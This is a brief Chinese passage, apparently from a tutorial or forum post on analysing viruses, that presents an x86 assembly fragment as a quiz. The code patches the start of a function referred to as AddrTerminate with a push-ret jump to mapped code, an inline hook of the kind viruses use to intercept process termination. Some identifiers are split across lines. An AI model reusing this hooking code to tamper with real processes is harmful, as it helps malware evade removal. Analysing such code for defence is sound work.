脱壳软件到处都有,源代码你肯定是得不到了,谁编病毒时会在编译命令中加/Zi 参数,连接的时候又加/DEBUG参数呀?当然可以反汇编得到汇编代码,但也非常难看懂。
你知道下面这段代码是做什么的吗?
push esi
push edi
lea esi,AddrMessage
lea edi,bAddrMessage
movsd
lea esi,AddrTerminate
lea edi,bTerminate
movsd
lea esi,lpMapped
Object lea edi,blpMapped
Object movsd
mov esi,AddrTerminate
lea edi,OldBytes
xor ecx,ecx
mov cl,7
rep movsb
mov eax,AddrTerminate
mov byte ptr[eax],68h
m2m dword ptr[eax+1],lpMapped
Object mov word ptr[eax+5],90c3h
pop edi
pop esi
retf